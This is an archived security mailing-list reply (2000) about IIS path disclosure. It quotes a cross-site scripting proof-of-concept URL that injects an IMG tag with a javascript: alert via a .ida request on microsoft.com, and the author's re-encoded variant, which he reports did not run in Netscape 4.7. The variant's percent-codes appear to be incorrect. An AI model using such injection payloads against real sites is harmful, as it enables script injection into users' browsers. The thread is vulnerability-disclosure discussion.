Re: IIS still revealing paths for web directories

From: Scott Buchanan (scottat_private)
Date: Thu Jan 13 2000 - 15:13:19 PST

Next message: Eric.Stevensat_private: "Re: IIS still revealing paths for web directories"

Previous message: Mikael Olsson: "Re: XML in IE 5.0"
Maybe in reply to: Vanja Hrustic: "IIS still revealing paths for web directories"
Next in thread: Eric.Stevensat_private: "Re: IIS still revealing paths for web directories"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Georgi Guninski wrote:
>
> For Communicator:
> http://www.microsoft.com/%3CIMG%20SRC=javascript:alert("window.location:"+window.location)%3E.ida

This link comes out as:

http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(

presumably because the quotes need to be % encoded as well.

http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(%34window.location:%34%43window.location)%3E.ida

This link, while it seems to work in as far as you can go to the
correct link, the Javascript doesn't get executed on this copy of
Netscape 4.7

-Scott Buchanan
Axe Communications

Next message: Eric.Stevensat_private: "Re: IIS still revealing paths for web directories"
Previous message: Mikael Olsson: "Re: XML in IE 5.0"
Maybe in reply to: Vanja Hrustic: "IIS still revealing paths for web directories"
Next in thread: Eric.Stevensat_private: "Re: IIS still revealing paths for web directories"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:28:06 PDT